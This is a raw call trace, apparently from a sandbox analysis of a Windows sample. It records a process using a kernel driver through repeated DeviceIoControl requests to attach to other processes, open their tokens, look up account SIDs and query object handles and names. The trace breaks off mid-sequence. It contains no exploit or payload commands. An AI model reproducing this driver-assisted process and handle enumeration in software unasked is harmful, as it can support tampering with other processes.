Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.111] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.111] PsReleaseProcessExitSynchronization () returned 0x2 [0156.111] ObfDereferenceObject (Object=0xfffffa8001ff7950) returned 0x12 [0156.111] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030b4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030b4044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.111] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.111] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.111] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x804) returned 0xc8 [0156.111] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.111] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002023890, HandleInformation=0x0) returned 0x0 [0156.111] ObOpenObjectByPointer (in: Object=0xfffffa8002023890, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0156.111] ObfDereferenceObject (Object=0xfffffa8002023890) returned 0x14 [0156.111] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa800300e100 | out: TokenHandle=0xfffffa800300e100*=0xc4) returned 0x0 [0156.111] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0156.111] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.112] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.112] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.113] CloseHandle (hObject=0xc4) returned 1 [0156.113] CloseHandle (hObject=0xc8) returned 1 [0156.113] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.113] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.114] PsLookupProcessByProcessId (in: ProcessId=0x804, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.114] PsAcquireProcessExitSynchronization () returned 0x0 [0156.114] KeStackAttachProcess (in: PROCESS=0xfffffa8002023890, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002023890, ApcState=0xfffff880051635d0) [0156.114] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fe3100, HandleInformation=0x0) returned 0x0 [0156.114] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.114] PsReleaseProcessExitSynchronization () returned 0x2 [0156.114] ObfDereferenceObject (Object=0xfffffa8002023890) returned 0x12 [0156.114] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003004044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003004044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.114] ObfDereferenceObject (Object=0xfffffa8001fe3100) returned 0x1 [0156.114] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.114] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.114] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.114] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0156.114] PsLookupProcessByProcessId (in: ProcessId=0x804, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.114] PsAcquireProcessExitSynchronization () returned 0x0 [0156.114] KeStackAttachProcess (in: PROCESS=0xfffffa8002023890, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002023890, ApcState=0xfffff880051635d0) [0156.114] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800202a630, HandleInformation=0x0) returned 0x0 [0156.114] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.114] PsReleaseProcessExitSynchronization () returned 0x2 [0156.114] ObfDereferenceObject (Object=0xfffffa8002023890) returned 0x12 [0156.114] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ff8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ff8044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.114] ObfDereferenceObject (Object=0xfffffa800202a630) returned 0x1 [0156.114] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.115] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.115] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.115] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.115] PsLookupProcessByProcessId (in: ProcessId=0x804, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.115] PsAcquireProcessExitSynchronization () returned 0x0 [0156.115] KeStackAttachProcess (in: PROCESS=0xfffffa8002023890, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002023890, ApcState=0xfffff880051635d0) [0156.115] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.115] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.115] PsReleaseProcessExitSynchronization () returned 0x2 [0156.115] ObfDereferenceObject (Object=0xfffffa8002023890) returned 0x12 [0156.115] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030ca7c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030ca7c4, ReturnLength=0xfffff88005163550) returned 0x0 [0156.115] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.115] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.115] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x814) returned 0xc8 [0156.115] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.115] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002040640, HandleInformation=0x0) returned 0x0 [0156.115] ObOpenObjectByPointer (in: Object=0xfffffa8002040640, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0156.115] ObfDereferenceObject (Object=0xfffffa8002040640) returned 0x14 [0156.115] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa800300e100 | out: TokenHandle=0xfffffa800300e100*=0xc4) returned 0x0 [0156.116] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0156.116] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.116] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.116] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.118] CloseHandle (hObject=0xc4) returned 1 [0156.118] CloseHandle (hObject=0xc8) returned 1 [0156.118] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.118] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.118] PsLookupProcessByProcessId (in: ProcessId=0x814, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.118] PsAcquireProcessExitSynchronization () returned 0x0 [0156.118] KeStackAttachProcess (in: PROCESS=0xfffffa8002040640, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002040640, ApcState=0xfffff880051635d0) [0156.118] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800206ad00, HandleInformation=0x0) returned 0x0 [0156.118] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.118] PsReleaseProcessExitSynchronization () returned 0x2 [0156.118] ObfDereferenceObject (Object=0xfffffa8002040640) returned 0x12 [0156.118] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030cb044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030cb044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.118] ObfDereferenceObject (Object=0xfffffa800206ad00) returned 0x1 [0156.119] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.119] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.119] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.119] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x92, lpOverlapped=0x0) returned 1 [0156.119] PsLookupProcessByProcessId (in: ProcessId=0x814, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.119] PsAcquireProcessExitSynchronization () returned 0x0 [0156.119] KeStackAttachProcess (in: PROCESS=0xfffffa8002040640, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002040640, ApcState=0xfffff880051635d0) [0156.119] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800206a260, HandleInformation=0x0) returned 0x0 [0156.119] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.119] PsReleaseProcessExitSynchronization () returned 0x2 [0156.119] ObfDereferenceObject (Object=0xfffffa8002040640) returned 0x12 [0156.119] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d4044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.119] ObfDereferenceObject (Object=0xfffffa800206a260) returned 0x1 [0156.120] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.120] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.120] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.120] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.120] PsLookupProcessByProcessId (in: ProcessId=0x814, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.120] PsAcquireProcessExitSynchronization () returned 0x0 [0156.120] KeStackAttachProcess (in: PROCESS=0xfffffa8002040640, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002040640, ApcState=0xfffff880051635d0) [0156.120] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.120] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.120] PsReleaseProcessExitSynchronization () returned 0x2 [0156.120] ObfDereferenceObject (Object=0xfffffa8002040640) returned 0x12 [0156.120] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030c1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c1044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.120] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.121] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.121] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x824) returned 0xc8 [0156.121] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.121] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002088b30, HandleInformation=0x0) returned 0x0 [0156.121] ObOpenObjectByPointer (in: Object=0xfffffa8002088b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0156.121] ObfDereferenceObject (Object=0xfffffa8002088b30) returned 0x14 [0156.121] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa800300e100 | out: TokenHandle=0xfffffa800300e100*=0xc4) returned 0x0 [0156.121] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0156.121] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.122] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.122] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.124] CloseHandle (hObject=0xc4) returned 1 [0156.124] CloseHandle (hObject=0xc8) returned 1 [0156.124] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.124] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.124] PsLookupProcessByProcessId (in: ProcessId=0x824, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.124] PsAcquireProcessExitSynchronization () returned 0x0 [0156.125] KeStackAttachProcess (in: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880051635d0) [0156.125] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002042af0, HandleInformation=0x0) returned 0x0 [0156.125] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.125] PsReleaseProcessExitSynchronization () returned 0x2 [0156.125] ObfDereferenceObject (Object=0xfffffa8002088b30) returned 0x12 [0156.125] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c0044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.125] ObfDereferenceObject (Object=0xfffffa8002042af0) returned 0x1 [0156.125] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.125] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.125] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.125] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0156.125] PsLookupProcessByProcessId (in: ProcessId=0x824, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.126] PsAcquireProcessExitSynchronization () returned 0x0 [0156.126] KeStackAttachProcess (in: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880051635d0) [0156.126] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800205acf0, HandleInformation=0x0) returned 0x0 [0156.126] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.126] PsReleaseProcessExitSynchronization () returned 0x2 [0156.126] ObfDereferenceObject (Object=0xfffffa8002088b30) returned 0x12 [0156.126] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030bf044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030bf044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.126] ObfDereferenceObject (Object=0xfffffa800205acf0) returned 0x1 [0156.126] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.126] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.126] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.126] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.126] PsLookupProcessByProcessId (in: ProcessId=0x824, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.126] PsAcquireProcessExitSynchronization () returned 0x0 [0156.127] KeStackAttachProcess (in: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880051635d0) [0156.127] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.127] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.127] PsReleaseProcessExitSynchronization () returned 0x2 [0156.127] ObfDereferenceObject (Object=0xfffffa8002088b30) returned 0x12 [0156.127] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002ff6044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ff6044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.127] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.127] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.127] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x834) returned 0xc8 [0156.127] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.127] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002095470, HandleInformation=0x0) returned 0x0 [0156.127] ObOpenObjectByPointer (in: Object=0xfffffa8002095470, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0156.128] ObfDereferenceObject (Object=0xfffffa8002095470) returned 0x14 [0156.128] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa800300e100 | out: TokenHandle=0xfffffa800300e100*=0xc4) returned 0x0 [0156.128] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0156.128] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.128] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.128] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.130] CloseHandle (hObject=0xc4) returned 1 [0156.130] CloseHandle (hObject=0xc8) returned 1 [0156.130] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.130] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.130] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.130] PsAcquireProcessExitSynchronization () returned 0x0 [0156.130] KeStackAttachProcess (in: PROCESS=0xfffffa8002095470, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002095470, ApcState=0xfffff880051635d0) [0156.130] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002091f20, HandleInformation=0x0) returned 0x0 [0156.130] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.131] PsReleaseProcessExitSynchronization () returned 0x2 [0156.131] ObfDereferenceObject (Object=0xfffffa8002095470) returned 0x12 [0156.131] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c9044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.131] ObfDereferenceObject (Object=0xfffffa8002091f20) returned 0x1 